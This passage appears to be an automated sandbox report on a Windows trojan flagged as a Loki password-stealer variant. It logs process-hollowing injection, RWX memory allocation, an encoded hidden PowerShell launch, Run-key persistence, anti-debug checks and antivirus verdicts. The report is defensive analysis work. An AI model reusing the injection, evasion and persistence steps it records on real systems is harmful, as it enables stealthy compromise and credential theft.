NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bfe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04bff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05711000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 27, 2022, 4:26 p.m.	process_identifier: 2428 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1

Looks up the external IP address (1 event)

domain

ip-api.com

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA==

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 27, 2022, 4:26 p.m.	show_type: 0 filepath_r: powershell parameters: -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA== filepath: powershell	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 27, 2022, 4:26 p.m.	flags: 1158 family: 0	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 27, 2022, 4:27 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Jan. 27, 2022, 4:26 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (14 events)

description	Communications use DNS	rule	Network_DNS
description	Run a KeyLogger	rule	KeyLogger
description	task schedule	rule	schtasks_Zero
description	Win32 PWS Loki	rule	Win32_PWS_Loki_Zero
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Jan. 27, 2022, 4:27 p.m.	process_identifier: 2084 region_size: 385024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000558	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Jan. 27, 2022, 4:26 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

aguywfrvgqg.exe tried to sleep 2728198 seconds, actually delayed analysis time by 2728198 seconds

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\xpsrchvw

reg_value

"C:\Users\test22\AppData\Roaming\xpsrchvw\xpsrchvw.exe"

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2428 manipulating memory of non-child process 2084
NtAllocateVirtualMemory Jan. 27, 2022, 4:27 p.m.	process_identifier: 2084 region_size: 385024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000558	1	0	0

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2428 injected into non-child 2084
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÄ\|ñaàd> @ à@äW À H.textDb d `.rsrc f@@.relocÀp@B base_address: 0x00400000 process_identifier: 2084 process_handle: 0x00000558	1	1	0
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: P8hd ÔÔ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°4StringFileInfo000004b0Comments"CompanyNameFileDescription0FileVersion1.3.0.06InternalNameClient.exe&LegalCopyrightLegalTrademarks>OriginalFilenameClient.exe"ProductName4ProductVersion1.3.0.08Assembly Version1.3.0.0t£ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly> base_address: 0x0045a000 process_identifier: 2084 process_handle: 0x00000558	1	1	0
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: @2 base_address: 0x0045c000 process_identifier: 2084 process_handle: 0x00000558	1	1	0
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2084 process_handle: 0x00000558	1	1	0

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2428 injected into non-child 2084
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÄ\|ñaàd> @ à@äW À H.textDb d `.rsrc f@@.relocÀp@B base_address: 0x00400000 process_identifier: 2084 process_handle: 0x00000558	1	1	0

File has been identified by 13 AntiVirus engines on VirusTotal as malicious (13 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Strictor.268128
FireEye	Gen:Variant.Strictor.268128
ESET-NOD32	a variant of MSIL/TrojanDownloader.Agent.KDD
Paloalto	generic.ml
BitDefender	Gen:Variant.Strictor.268128
Emsisoft	Gen:Variant.Strictor.268128 (B)
SentinelOne	Static AI - Malicious PE
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
GData	Gen:Variant.Strictor.268128
ALYac	Gen:Variant.Strictor.268128
APEX	Malicious
MAX	malware (ai score=86)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2428 called NtSetContextThread to modify thread in remote process 2084
NtSetContextThread Jan. 27, 2022, 4:27 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4555326 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000055c process_identifier: 2084	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2428 resumed a thread in remote process 2084
NtResumeThread Jan. 27, 2022, 4:27 p.m.	thread_handle: 0x0000055c suspend_count: 1 process_identifier: 2084	1	0	0

Executed a process and injected code into it, probably while unpacking (28 events)

Time & API	Arguments	Status	Return
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2428	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2428	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 2428	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2428	1	0
CreateProcessInternalW Jan. 27, 2022, 4:26 p.m.	thread_identifier: 2556 thread_handle: 0x0000037c process_identifier: 2552 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMgAwAA== filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000384	1	1
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x000004c8 suspend_count: 1 process_identifier: 2428	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x000004e0 suspend_count: 1 process_identifier: 2428	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x000004fc suspend_count: 1 process_identifier: 2428	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x0000054c suspend_count: 1 process_identifier: 2428	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x00000560 suspend_count: 1 process_identifier: 2428	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x00000580 suspend_count: 1 process_identifier: 2428	1	0
NtGetContextThread Jan. 27, 2022, 4:27 p.m.	thread_handle: 0x0000014c	1	0
NtGetContextThread Jan. 27, 2022, 4:27 p.m.	thread_handle: 0x0000014c	1	0
NtResumeThread Jan. 27, 2022, 4:27 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2428	1	0
CreateProcessInternalW Jan. 27, 2022, 4:27 p.m.	thread_identifier: 2080 thread_handle: 0x0000055c process_identifier: 2084 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\aguywfrvgqg.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000558	1	1
NtGetContextThread Jan. 27, 2022, 4:27 p.m.	thread_handle: 0x0000055c	1	0
NtAllocateVirtualMemory Jan. 27, 2022, 4:27 p.m.	process_identifier: 2084 region_size: 385024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000558	1	0
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÄ\|ñaàd> @ à@äW À H.textDb d `.rsrc f@@.relocÀp@B base_address: 0x00400000 process_identifier: 2084 process_handle: 0x00000558	1	1
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: base_address: 0x00402000 process_identifier: 2084 process_handle: 0x00000558	1	1
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: P8hd ÔÔ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°4StringFileInfo000004b0Comments"CompanyNameFileDescription0FileVersion1.3.0.06InternalNameClient.exe&LegalCopyrightLegalTrademarks>OriginalFilenameClient.exe"ProductName4ProductVersion1.3.0.08Assembly Version1.3.0.0t£ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly> base_address: 0x0045a000 process_identifier: 2084 process_handle: 0x00000558	1	1
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: @2 base_address: 0x0045c000 process_identifier: 2084 process_handle: 0x00000558	1	1
WriteProcessMemory Jan. 27, 2022, 4:27 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2084 process_handle: 0x00000558	1	1
NtSetContextThread Jan. 27, 2022, 4:27 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4555326 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000055c process_identifier: 2084	1	0
NtResumeThread Jan. 27, 2022, 4:27 p.m.	thread_handle: 0x0000055c suspend_count: 1 process_identifier: 2084	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x0000043c suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread Jan. 27, 2022, 4:26 p.m.	thread_handle: 0x00000488 suspend_count: 1 process_identifier: 2552	1	0

aguywfrvgqg.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All